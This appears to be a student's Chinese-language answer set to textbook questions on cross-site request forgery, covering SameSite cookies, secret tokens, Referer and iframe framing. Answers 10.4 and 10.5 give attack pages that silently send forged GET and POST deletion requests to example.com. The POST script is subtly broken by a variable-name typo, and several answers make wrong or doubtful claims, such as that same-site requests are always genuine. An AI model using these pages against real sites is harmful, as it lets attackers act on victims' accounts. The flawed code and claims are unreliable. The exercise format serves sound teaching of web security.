10.1. Explain why the same-site cookie can help prevent CSRF attacks.

同一个站点cookie有一个由服务器设置的特殊属性SameSite。如果存在此属性，并且其值是严格的，则浏览器将不会将cookie与跨站点请求一起发送。服务器可以检测到cookie的缺失并选择不响应或出错，从而防止攻击。

10.2. Explain how a website can use secret token to prevent CSRF attacks, and why does it work?

token由服务器提供 隐藏在页面 随着请求一起发送 而恶意网站伪造的请求 没有token 或者token不对

10.3. These days, most of the websites use HTTPS, instead of HTTP. Do we still need to worry about CSRF attacks?

HTTPS只是对客户机和服务器之间的通信进行加密，但几乎无法检测信息来自何处，因此即使在HTTPS站点中，CSRF攻击也是可能的。

10.4. Using LiveHTTPHeader, we find out that the following GET request is used to send an HTTP request to www.example.com to delete a page owned by a user (only the owner of a page can delete the page).

http://www.example.com/delete.php?pageid=5
GET /delete.php?pageid=5
Host: www.example.com
...

Please construct a simple malicious web page, so when a victim visits this web page, a forged request will be launched against www.example.com to delete a page belonging to the user.

<html>
    <body>
        <h1>task</h1>
        <img src="http://www.example.com/delete.php?pageid=5" alt="image" width="1" height="1">
    </body>
</html>

10.5. Using LiveHTTPHeader, we find out that the following POST request is used to send an HTTP request to www.example.com to delete a page owned by a user (only the owner of a page can delete the page).

http://www.example.com/delete.php
POST /delete.php HTTP/1.1
Host: www.example.com
...
Content-Length: 8
pageid=5

Please construct a simple malicious web page, so when a victim visits this web page, a forged request will be launched against www.example.com to delete a page belonging to the user.

<html>
    <body>
        <script type="text/javascript">
            function forge_post(){
                var fieles="<input type='hidden' name='pageid' value='5'>"
                var p = document.createElement("form");
                p.action = "http://www.example.com/delete.php";
                p.innerHTML = fields;
                p.method = "post";
                document.body.appendChild(p);
                p.submit();
            }
            window.onload=function(){
                forge_post();
            }
        </script>
    </body>
</html>

10.6. The forged HTTP request against Elgg in this chapter needs Boby’s user id (guid) to work properly. If Alice targets Boby specifically, before the attack, she needs to find ways to get Boby’s user id. Alice does not know Boby’s Elgg password, so she cannot log into Boby’s account to get the information. Please describe how Alice can find out Boby’s user id.

为了得到被攻击者的 user id 加boby好友 观察请求报文 分析得到boby的user id

10.7. In a request, there is an user id, which is a random number generated by the server. The ID information can be found from the user’s page from the server. If an attacker does not know this user ID, can he/she still launch an CSRF attack on this service?

不能。不可能读取另一个页面的内容，因此在不知道id的情况下，攻击者无法发送伪造的请求。

10.8. If Alice would like to launch the attack on anybody who visits her malicious web page. In this case, she does not know who is visiting the web page before hand. (1) Can she still launch a CSRF attack to modify the victim’s Elgg profile? Please explain. (2) Can she launch a CSRF attack to add her to the victim’s friend list? Please explain.

可以 cookie自动提交

可以 请求只要填入alice的id 就行 cookie会自动提交

10.9. When a web page sends a request to its server, the session ID is always attached in the cookie section of the HTTP header. A web application requires all the requests from its own page to also attach the session ID in its data part (for GET requests, the session ID is attached in the URL, while for POST requests, the session ID is included in the payload). This sounds redundant, because the session ID is already included in the request.However, by checking whether a request has the session ID in its data part, the web server can tell whether a request is a cross-site request or not. Please explain why.

同源策略，不同的源的页面不能读取其他源的cookie内容 同站点才能操作cookie 得到其中的session id 并附加发送

10.10. Do browsers know whether an HTTP request is cross-site or not?

浏览器知道请求来自哪个页面，也知道请求发送到哪个站点。通过验证它们不在同一域中，浏览器可以知道这是否是跨站点请求。

10.11. Do servers know whether an HTTP request is cross-site or not?

这取决于服务器的编写方式。如果服务器在每个页面中嵌入一个特殊的令牌，并期望该令牌作为请求的一部分，那么令牌的存在或不存在可以告诉服务器请求是同一站点还是跨站点的。

10.12. Why cannot a web server use the referer header to tell whether a request is cross-site or not?

因为很多浏览器在向服务器发送请求之前会删除referer头，以尊重用户的隐私。

10.13. Why is it important for a server to know whether a request is cross-site or not?

因为跨站点请求可以伪造，而同一个站点请求总是真实的。

10.14. Can we simply ask browsers not to attach any cookie for cross-site requests?

不能，有很多使用跨站点请求的合法案例。例如，您的facebook.com凭据可用于登录instagram.com。如果浏览器不附加cookie，身份验证将永远无法工作。

10.15. If a page from www.example.com contains an iframe, inside which a facebook page is displayed. If a request is sent from inside the iframe, is it considered as a cross-site request or not? If not, how can be this secured?

来自iframe内的请求不被视为跨站点请求。这可以通过使用X-Frame-Options头来保护。它可以设置为deny, sameorigin, or allow-from。前两个是不言自明的。最后一个选项获取允许在iframe中放置页面的站点列表。